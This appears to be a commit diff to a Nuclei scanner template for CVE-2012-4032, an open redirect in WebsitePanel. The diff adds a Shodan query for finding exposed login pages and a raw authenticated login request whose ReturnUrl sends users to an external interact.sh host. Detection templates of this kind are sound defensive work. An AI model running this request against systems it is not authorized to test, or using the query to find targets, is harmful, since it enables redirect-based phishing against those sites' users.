updated req & metadata

http/cves/2012/CVE-2012-4032.yaml

@@ -17,12 +17,21 @@ info:
     cve-id: CVE-2012-4032
     cwe-id: CWE-20
     cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:*
-  tags: cve,cve2012,redirect,websitepanel
+  metadata:
+    max-request: 1
+    shodan-query: title:"WebsitePanel" html:"login"
+  tags: cve,cve2012,redirect,websitepanel,authenticated
 
 http:
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/hosting/Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh"
+        POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+        Content-Type: application/x-www-form-urlencoded
+
+        ctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default
 
     matchers:
       - type: regex